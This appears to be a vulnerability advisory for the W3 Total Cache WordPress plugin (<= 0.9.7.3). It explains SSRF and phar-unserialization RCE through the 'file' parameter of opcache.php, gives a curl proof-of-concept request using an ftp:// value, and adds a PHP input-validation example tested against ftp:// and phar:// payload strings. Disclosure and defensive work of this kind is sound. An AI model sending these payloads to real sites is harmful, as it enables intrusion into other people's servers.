W3 Total Cache <= 0.9.7.3 - SSRF / RCE via phar



Description
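The implementation of `opcache_flush_file` calls `file_exists` with a parameter fully controlled by the user. Because `file_exists` honors PHP stream wrappers, a URL such as `ftp://` makes the server open an outbound connection (SSRF), and on PHP versions before 8.0 a `phar://` path causes the archive's metadata to be unserialized, which is the RCE vector named in the title.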
Proof of Concept
curl 'http://x.x.x.x/wp-content/plugins/w3-total-cache/pub/opcache.php' --data 'nonce=974ca6ad15021a6668e7ae02e1be551c&command=flush_file&file=ftp://y.y.y.y:zzzz/' 
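
The check below is an added example, not the plugin's code and not the change made in 0.9.7.4: one way to validate a user-supplied `file` value before it reaches `file_exists`. The function name `example_resolve_flush_target` and the base-directory policy are assumptions.

```php
<?php
// Added example, not W3 Total Cache code. The function name and the
// base-directory policy are assumptions made for illustration.

/**
 * Return the canonical path of $userPath if it is a regular local file
 * under $baseDir, or null. The wrapper check runs before any filesystem
 * call, so file_exists()/is_file() never see a URL.
 */
function example_resolve_flush_target(string $userPath, string $baseDir): ?string
{
    // Reject empty input, NUL bytes, and anything naming a stream wrapper
    // (ftp://, http://, phar://, php://, data:, ...).
    if ($userPath === '' || strpos($userPath, "\0") !== false) {
        return null;
    }
    if (strpos($userPath, '://') !== false || stripos($userPath, 'data:') === 0) {
        return null;
    }
    // realpath() resolves ../ and symlinks on the local filesystem.
    $base = realpath($baseDir);
    $real = realpath($userPath);
    if ($base === false || $real === false) {
        return null;
    }
    // The resolved path must stay inside the allowed directory.
    if (strpos($real, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return is_file($real) ? $real : null;
}

// Constructed sample tree and inputs.
$base = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'flush-example-' . getmypid();
mkdir($base, 0700, true);
$good = $base . DIRECTORY_SEPARATOR . 'page.php';
file_put_contents($good, "<?php // constructed sample\n");
$inputs = [
    'ftp://y.y.y.y:zzzz/',    // value from the proof of concept above
    'phar://' . $good,        // constructed: wrapper in front of a real file
    $base . '/../',           // constructed: resolves outside the base
    $good,                    // constructed: legitimate target
];
foreach ($inputs as $in) {
    $out = example_resolve_flush_target($in, $base);
    printf("%-70s %s\n", $in, $out === null ? 'rejected' : 'accepted');
}
unlink($good);
rmdir($base);
```

Only the last input is accepted; the wrapper-prefixed values are rejected before any filesystem function is called on them.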

Affects Plugin

W3 Total Cache: fixed in version 0.9.7.4

References

URL https://plugins.trac.wordpress.org/changeset/2081515/w3-total-cache#file24

Classification

Type MULTI

Miscellaneous

Original Researcher Thomas Chauchefoin
Verified Yes
WPVDB ID 9270

Timeline

Publicly Published 2019-05-06
Added 2019-05-06
Last Updated 2019-05-07
